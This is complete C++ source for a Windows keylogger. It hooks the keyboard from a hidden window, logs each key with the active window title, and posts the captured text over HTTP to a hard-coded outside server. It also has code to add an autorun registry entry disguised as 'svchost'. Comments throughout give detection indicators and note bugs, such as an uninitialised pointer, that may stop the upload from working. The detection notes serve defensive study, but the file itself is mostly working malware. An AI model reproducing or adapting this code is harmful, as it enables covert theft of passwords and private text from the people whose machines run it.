
/** (c) 2012 Michał (Foxbond) Chraniuk */
#define _WIN32_WINNT 0x0500
#include <windows.h>
#include <iostream>
//#include <fstream>
#include <ctime>
#include <stdio.h>
#include <string>
#include <cstdio>
#include <unistd.h>


#include "curl/curl.h"

#include "base64/base64.h"
#include "base64/base64.cpp"

using namespace std;

// Handle returned by SetWindowsHookEx(WH_KEYBOARD_LL, ...) in WinMain; passed to CallNextHookEx/UnhookWindowsHookEx.
HHOOK hKeyboardHook = 0;
// In-memory capture buffer. The hook callback appends key text and window/time headers here;
// save_log() posts it to a remote URL and appends it to a local file.
string LogFile;
// Last foreground window seen by the hook callback; used to detect a window change.
HWND hCurrentWindow;
// Title of the foreground window, filled by GetWindowText with a 256-byte limit.
char sWindowTitle[256];
// CR LF pair used as a line break in the capture buffer.
// NOTE(review): the array has no terminating NUL, yet it is appended with `LogFile += cReturn`,
// which treats it as a C string - captured output may carry stray bytes after the line break.
char cReturn[] = {13, 10};
SYSTEMTIME SystemTime;
// Scratch buffer for the formatted "[ Czas: hh:mm:ss, " header.
char cTime[64];
// Not referenced anywhere in the visible listing.
char cFileName[64];
// Consecutive-failure counter maintained by save_log().
unsigned short int error_count=0;
// Not referenced anywhere in the visible listing.
#define BUFSIZE 128
//#define cURL_SAVE_BUFFER 2048
// Capture-buffer size (in characters) above which the hook callback triggers save_log().
unsigned int save_buffer_size = 2048;
// Declared only; no definition appears in the visible listing.
int test_key(void);
void create_key(void);
void makeSpecialActions(void);

// Selects the registry hive in create_key(): 1 = HKEY_CURRENT_USER, 2 = HKEY_LOCAL_MACHINE.
// The value here is 0 and no visible code changes it.
int regtype = 0;
// Data written to the Run-key value by create_key(). The file name imitates the Windows
// svchost.exe binary but points under the user's %appdata% - a masquerading indicator
// worth alerting on in autorun inventories.
string key_path = "%appdata%\\Microsoft\\Windows\\svchost.exe";

LRESULT CALLBACK WindowProcedure (HWND, UINT, WPARAM, LPARAM);

/*  Make the class name into a global variable  */
char szClassName[ ] = "WindowsApp";

void save_log (void);

/**
 * Low-level keyboard hook callback installed by WinMain with WH_KEYBOARD_LL.
 *
 * For every WM_KEYUP event it appends a textual form of the key to the global
 * LogFile buffer. When the foreground window differs from the one seen on the
 * previous key, it first appends a header with the current time (GetSystemTime)
 * and the window title. Once LogFile grows past save_buffer_size it calls
 * save_log(). The event is always forwarded with CallNextHookEx, so typing is
 * not blocked or altered.
 *
 * Analyst note: a system-wide WH_KEYBOARD_LL hook owned by a process with no
 * visible window, combined with GetForegroundWindow/GetWindowText on key events,
 * is the behavioural pattern endpoint tooling associates with keystroke capture.
 *
 * @param nCode  hook code; events are only inspected when it is >= 0
 * @param wParam keyboard message identifier; only WM_KEYUP is handled
 * @param lParam pointer to a KBDLLHOOKSTRUCT describing the key
 * @return the result of CallNextHookEx
 */
LRESULT CALLBACK LowLevelKeyboardProc(int nCode, WPARAM wParam, LPARAM lParam)
{
	KBDLLHOOKSTRUCT *pKbdLLHookStruct = (KBDLLHOOKSTRUCT *)lParam;
	if (nCode >= 0)
	{
		// Only key releases are recorded; key-down and WM_SYSKEY* messages fall through untouched.
		if (wParam == WM_KEYUP)
		{
			// Foreground window changed since the last recorded key: write a context header.
			if(hCurrentWindow != GetForegroundWindow())
			{
				hCurrentWindow = GetForegroundWindow();
				GetWindowText(hCurrentWindow, sWindowTitle, 256);
				// GetSystemTime returns UTC, so header times are not local time.
				GetSystemTime(&SystemTime);
				// previously sprintf_s
				sprintf(cTime, "[ Czas: %02d:%02d:%02d, ", SystemTime.wHour, SystemTime.wMinute, SystemTime.wSecond);
				LogFile += cReturn;
				LogFile += cTime;
				LogFile += " Nazwa okna: ";
				LogFile += sWindowTitle;
				LogFile += " ]";
				LogFile += cReturn;
			}



			// Translate the virtual-key code to text. Keys without a case below are not recorded.
			switch(pKbdLLHookStruct->vkCode)
			{
				// Named control keys are written as bracketed tags.
				case VK_RETURN:
					LogFile += "[Enter]";
					LogFile += cReturn;

					break;
				case VK_BACK:
					LogFile += "[Backspace]";
					break;
				case VK_ESCAPE:
					LogFile += "[Escape]";
					break;
				case VK_CAPITAL:
					LogFile += "[Capslock]";
					break;
				case VK_LMENU:
					LogFile += "[LAlt]";
					break;
				case VK_RMENU:
					LogFile += "[RAlt]";
					break;
				case VK_MENU:
					LogFile += "[Alt]";
					break;
				case VK_CONTROL:
					LogFile += "[Ctrl]";
					break;
				case VK_DELETE:
					LogFile += "[Delete]";
					break;
				case VK_SPACE:
					LogFile += " ";
					break;
				// Numeric-keypad operators.
				case VK_MULTIPLY:
					LogFile += "*";
					break;
				case VK_ADD:
					LogFile += "+";
					break;
				case VK_SUBTRACT:
					LogFile += "-";
					break;
				case VK_DECIMAL:
					LogFile += ".";
					break;
				case VK_DIVIDE:
					LogFile += "/";
					break;
				// Punctuation keys, matched by raw virtual-key number. The character is
				// chosen from the Shift state reported by GetAsyncKeyState.
				case 188:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "<";
					else
						LogFile += ",";
					break;
				case 192:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "~~";
					else
						LogFile += "`";
					break;
				case 222:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "\"";
					else
						LogFile += "'";
					break;
				case 220:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "|";
					else
						LogFile += "\\";
					break;
				case 219:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "{";
					else
						LogFile += "[";
					break;
				case 221:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "}";
					else
						LogFile += "]";
					break;
				case 186:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += ":";
					else
						LogFile += ";";
					break;
				case 191:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "?";
					else
						LogFile += "/";
					break;
				case 190:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += ">";
					else
						LogFile += ".";
					break;
				case 44:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "<";
					else
						LogFile += ",";
					break;
				case 187:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "+";
					else
						LogFile += "=";
					break;
				case 189:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "_";
					else
						LogFile += "-";
					break;
				// Letter keys, virtual-key codes 65-90: upper case when either Shift key is
				// reported down, lower case otherwise.
				case 65:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "A";
					else
						LogFile += "a";
					break;
				case 66:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "B";
					else
						LogFile += "b";
					break;
				case 67:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "C";
					else
						LogFile += "c";
					break;
				case 68:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "D";
					else
						LogFile += "d";
					break;
				case 69:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "E";
					else
						LogFile += "e";
					break;
				case 70:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "F";
					else
						LogFile += "f";
					break;
				case 71:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "G";
					else
						LogFile += "g";
					break;
				case 72:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "H";
					else
						LogFile += "h";
					break;
				case 73:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "I";
					else
						LogFile += "i";
					break;
				case 74:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "J";
					else
						LogFile += "j";
					break;
				case 75:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "K";
					else
						LogFile += "k";
					break;
				case 76:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "L";
					else
						LogFile += "l";
					break;
				case 77:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "M";
					else
						LogFile += "m";
					break;
				case 78:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "N";
					else
						LogFile += "n";
					break;
				case 79:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "O";
					else
						LogFile += "o";
					break;
				case 80:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "P";
					else
						LogFile += "p";
					break;
				case 81:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "Q";
					else
						LogFile += "q";
					break;
				case 82:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "R";
					else
						LogFile += "r";
					break;
				case 83:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "S";
					else
						LogFile += "s";
					break;
				case 84:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "T";
					else
						LogFile += "t";
					break;
				case 85:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "U";
					else
						LogFile += "u";
					break;
				case 86:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "V";
					else
						LogFile += "v";
					break;
				case 87:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "W";
					else
						LogFile += "w";
					break;
				case 88:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "X";
					else
						LogFile += "x";
					break;
				case 89:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "Y";
					else
						LogFile += "y";
					break;
				case 90:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "Z";
					else
						LogFile += "z";
					break;
				// Numeric-keypad digits are recorded as plain digits.
				case VK_NUMPAD0:
					LogFile += "0";
					break;
				case VK_NUMPAD1:
					LogFile += "1";
					break;
				case VK_NUMPAD2:
					LogFile += "2";
					break;
				case VK_NUMPAD3:
					LogFile += "3";
					break;
				case VK_NUMPAD4:
					LogFile += "4";
					break;
				case VK_NUMPAD5:
					LogFile += "5";
					break;
				case VK_NUMPAD6:
					LogFile += "6";
					break;
				case VK_NUMPAD7:
					LogFile += "7";
					break;
				case VK_NUMPAD8:
					LogFile += "8";
					break;
				case VK_NUMPAD9:
					LogFile += "9";
					break;
				// Top-row digit keys, virtual-key codes 48-57: the shifted symbol is written
				// when either Shift key is reported down.
				case 48:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += ")";
					else
						LogFile += "0";
					break;
				case 49:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "!";
					else
						LogFile += "1";
					break;
				case 50:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "@";
					else
						LogFile += "2";
					break;
				case 51:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "#";
					else
						LogFile += "3";
					break;
				case 52:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "$";
					else
						LogFile += "4";
					break;
				case 53:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "%";
					else
						LogFile += "5";
					break;
				case 54:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "^";
					else
						LogFile += "6";
					break;
				case 55:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "&";
					else
						LogFile += "7";
					break;
				case 56:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "*";
					else
						LogFile += "8";
					break;
				case 57:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "(";
					else
						LogFile += "9";
					break;
			}// end of switch (probably)

			// Flush once the buffer exceeds save_buffer_size. save_log() performs a blocking
			// HTTP request, and it runs here inside the hook callback.
			if ( LogFile.size() > save_buffer_size )
			{
                 save_log(); //cURL save

            }

		}
	}

	// Always pass the event on to the next hook in the chain.
	return CallNextHookEx(hKeyboardHook, nCode, wParam, lParam);
}



/**
 * Program entry point.
 *
 * Registers a window class, creates a 1x1 window titled "SYSTEM" that is shown
 * with SW_HIDE (never visible), installs the WH_KEYBOARD_LL hook that feeds
 * LowLevelKeyboardProc, calls makeSpecialActions() (which in this listing leads
 * to the Run-key write in create_key()), and then pumps messages until WM_QUIT.
 * The hook is removed when the loop ends.
 *
 * Analyst note: the hidden window exists only to host a message loop, which a
 * low-level hook needs in order to receive events. A GUI-subsystem process with
 * no visible window and a global keyboard hook is a useful triage signal.
 */
int WINAPI WinMain (HINSTANCE hThisInstance, HINSTANCE hPrevInstance, LPSTR lpszArgument, int nFunsterStil) {
    HWND hwnd;               /* This is the handle for our window */
    MSG messages;            /* Here messages to the application are saved */
    WNDCLASSEX wincl;        /* Data structure for the windowclass */

    /* The Window structure */
    wincl.hInstance = hThisInstance;
    wincl.lpszClassName = szClassName;
    wincl.lpfnWndProc = WindowProcedure;      /* This function is called by windows */
    wincl.style = CS_DBLCLKS;                 /* Catch double-clicks */
    wincl.cbSize = sizeof (WNDCLASSEX);

    /* Use default icon and mouse-pointer */
    wincl.hIcon = LoadIcon (NULL, IDI_APPLICATION);
    wincl.hIconSm = LoadIcon (NULL, IDI_APPLICATION);
    wincl.hCursor = LoadCursor (NULL, IDC_ARROW);
    wincl.lpszMenuName = NULL;                 /* No menu */
    wincl.cbClsExtra = 0;                      /* No extra bytes after the window class */
    wincl.cbWndExtra = 0;                      /* structure or the window instance */
    /* Use Windows's default color as the background of the window */
    wincl.hbrBackground = (HBRUSH) COLOR_BACKGROUND;

    /* Register the window class, and if it fails quit the program */
    if (!RegisterClassEx (&wincl)) {
        MessageBox(0, "Nie uda�o si� zarejestrowa� klasy! Program ko�czy dzia�anie...", 0, 0);
        return 0;
    }

    /* The class is registered, let's create the program*/
    hwnd = CreateWindowEx (
           0,                   /* Extended possibilites for variation */
           szClassName,         /* Classname */
           "SYSTEM",       /* Title Text */
           WS_OVERLAPPEDWINDOW, /* default window */
           CW_USEDEFAULT,       /* Windows decides the position */
           CW_USEDEFAULT,       /* where the window ends up on the screen */
           1,                 /* The programs width */
           1,                 /* and height in pixels */
           HWND_DESKTOP,        /* The window is a child-window to desktop */
           NULL,                /* No menu */
           hThisInstance,       /* Program Instance handler */
           NULL                 /* No Window Creation data */
           );

    /* SW_HIDE keeps the window off screen; nothing in this listing ever shows it */
    ShowWindow (hwnd, SW_HIDE);

    /* Install the system-wide low-level keyboard hook; a failure is only reported, execution continues */
    hKeyboardHook = SetWindowsHookEx(WH_KEYBOARD_LL, (HOOKPROC)LowLevelKeyboardProc, GetModuleHandle(0), 0);
	if(hKeyboardHook == NULL)
		MessageBox(0, "Funkcja SetWindowsHookEx nie powiodła się.", 0, 0);


    /* Startup actions; in this listing that is create_key(), the autorun registry write */
    makeSpecialActions();


    /* Run the message loop. It will run until GetMessage() returns 0 */
    while (GetMessage (&messages, NULL, 0, 0))
    {
        /* Translate virtual-key messages into character messages */
        TranslateMessage(&messages);
        /* Send message to WindowProcedure */
        DispatchMessage(&messages);
    }


    /* Remove the keyboard hook once the message loop has ended */
    if(UnhookWindowsHookEx(hKeyboardHook) == 0)
		MessageBox(0, "Funkcja UnhookWindowsHookEx nie powiodła się.", 0, 0);

	return EXIT_SUCCESS;
}


/*  Window procedure reached through DispatchMessage(). It handles only
    WM_DESTROY itself and defers every other message to DefWindowProc.  */

LRESULT CALLBACK WindowProcedure (HWND hwnd, UINT message, WPARAM wParam, LPARAM lParam)
{
    /* Anything that is not WM_DESTROY gets the default system handling */
    if (message != WM_DESTROY)
        return DefWindowProc (hwnd, message, wParam, lParam);

    /* Window destroyed: queue WM_QUIT so the message loop in WinMain ends */
    PostQuitMessage (0);
    return 0;
}

// Receives libcurl's error text; registered with CURLOPT_ERRORBUFFER in save_log()
// and appended to LogFile when a transfer fails.
static char errorBuffer[CURL_ERROR_SIZE];

// Collects the HTTP response body through the writer() callback (CURLOPT_WRITEDATA).
// Nothing in the visible listing reads or clears it, so it grows with every response.
static string buffer;

// libcurl write callback: appends the received chunk (size * nmemb bytes) to
// *buffer and reports how many bytes were taken. With a null destination
// nothing is stored and 0 is returned.
static int writer(char *data, size_t size, size_t nmemb,
                  std::string *buffer)
{
  // No destination: report zero bytes handled
  if (buffer == NULL)
    return 0;

  // Length of this chunk in bytes
  const size_t chunk_len = size * nmemb;
  buffer->append(data, chunk_len);

  // Narrowed to int exactly as the return type requires
  return chunk_len;
}

/**
 * Flushes the capture buffer: builds a form body with the fields version, id
 * and log, POSTs it with libcurl to a hard-coded URL, and appends LogFile to
 * "buffer.txt" in the process's current directory.
 *
 * On a successful transfer LogFile is written to the file and cleared. On
 * failure error_count is incremented and an error marker (plus libcurl's error
 * text) is appended to LogFile; once error_count reaches 2 the buffer is
 * written to the file without being cleared and the counter is reset.
 *
 * Analyst notes:
 *  - Network indicators on this page: the URL literal below, the commented-out
 *    default URL, and a POST body of the shape version=...&id=...&log=... .
 *    The scheme is plain HTTP, so the body is visible to network inspection.
 *  - Host indicator: a file named buffer.txt that grows in the working
 *    directory of the process.
 *  - As written, method_post is never assigned before sprintf writes through
 *    it, and the %d conversions are given char* arguments, so behaviour from
 *    that line on is undefined. A build of exactly this source may fail before
 *    any request is sent; do not rely on network indicators alone.
 */
void save_log (void)
{
     // upload via cURL
     CURL *curl;
     CURLcode result;
     //default: http://foxbond.cba.pl/bots/keylogger/revelation_log_handler.php
     //string url=reader.Get("cpp", "url", "aHR0cDovL2ZveGJvbmQuY2JhLnBsL2JvdHMva2V5bG9nZ2VyL3JldmVsYXRpb25fbG9nX2hhbmRsZXIucGhw");
     // Hard-coded collection endpoint (plain HTTP)
     string url = "http://danarroth.com/klr/logHandler.php";
     // NOTE(review): never initialised or allocated anywhere in this function
     char* method_post;
     //char *format = ;
     string version = "0.1"; //reader.Get("cpp", "version", "0");
     string id = "0"; //reader.Get("cpp", "id", "0");

     // NOTE(review): writes through the uninitialised pointer; %d is paired with char* arguments
     sprintf(method_post, "version=%d&id=%d&log=%d", version.c_str(), id.c_str(), LogFile.c_str() );

    curl = curl_easy_init();
    if (curl)
    {
      // Now set up all of the curl options

      curl_easy_setopt(curl, CURLOPT_ERRORBUFFER, errorBuffer);
      curl_easy_setopt(curl, CURLOPT_URL, url.c_str() );
      //curl_easy_setopt(curl, CURLOPT_HEADER, 0);
      //curl_easy_setopt(curl, CURLOPT_FOLLOWLOCATION, 1);
      curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, writer);
      curl_easy_setopt(curl, CURLOPT_WRITEDATA, &buffer);
      curl_easy_setopt(curl, CURLOPT_POST, 1);
      curl_easy_setopt(curl, CURLOPT_POSTFIELDS, method_post);

      // Send the POST; the server's response body is collected in the file-level `buffer`
      result = curl_easy_perform(curl);

      // Always cleanup
      curl_easy_cleanup(curl);


      // Did we succeed?
      if (result == CURLE_OK)  {
        //ok
        // The uploaded text is also kept locally: appended to buffer.txt, then cleared from memory
        string log_filename = "buffer.txt"; // name of the log buffer file
        FILE *file;
        file=fopen(log_filename.c_str(),"a"); // append mode
        fputs(LogFile.c_str(),file);
        fclose(file);
        LogFile.clear(); // clear the log
      }
      else {
        //error
        error_count++;
        LogFile += "\n Save Error!!! \n";
        LogFile += errorBuffer;
        LogFile += "\n end error log \n";
      }

    }
    else {
        //curl object error
        error_count++;
        LogFile += "\n cURL init error!!! \n";
    }

    // Two accumulated failures: write the buffer to disk but keep it in memory for a later upload attempt
    if (error_count >= 2) {
        string log_filename = "buffer.txt"; // name of the log buffer file
        FILE *file;
        file=fopen(log_filename.c_str(),"a"); // append mode
        fputs(LogFile.c_str(),file);
        fclose(file);
        //LogFile.clear(); // clear the log
        error_count = 0;
        LogFile += "\n Second error. Log saved to file, buffer uncleared! \n";
      }


}


/**
 * Autorun persistence: opens or creates the
 * SOFTWARE\Microsoft\Windows\CurrentVersion\Run key under HKEY_CURRENT_USER
 * (regtype == 1) or HKEY_LOCAL_MACHINE (regtype == 2) and, if that succeeded,
 * sets a REG_SZ value named "svchost" whose data is key_path.
 *
 * Analyst notes:
 *  - Detection: a Run-key value named "svchost" whose data points under the
 *    user's %appdata% rather than the Windows system directory is a
 *    masquerading indicator; registry auditing or an autoruns inventory
 *    surfaces it.
 *  - regtype is initialised to 0 at file scope and no visible code changes it,
 *    so in this listing neither RegCreateKey call is reached and reg_key is
 *    read without having been assigned.
 */
void create_key(void)
{
		int reg_key;
		HKEY hkey;

		// Value data for the Run entry, taken from the global key_path
		char *path = (char*)key_path.c_str();

		// Per-user autorun location
		if (regtype == 1)
		{
            reg_key=RegCreateKey(HKEY_CURRENT_USER,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&hkey);
        }
        // Machine-wide autorun location
        else if (regtype == 2)
        {
            reg_key=RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&hkey);
        }
        
        // 0 is the success status returned by RegCreateKey
        if(reg_key==0)
		{
				RegSetValueEx((HKEY)hkey,"svchost",0,REG_SZ,(BYTE *)path,strlen(path));
		}

}

// Startup actions invoked from WinMain after the keyboard hook is installed.
// The only action in this listing is create_key(), the Run-key registry write.
void makeSpecialActions(){
	create_key();
}
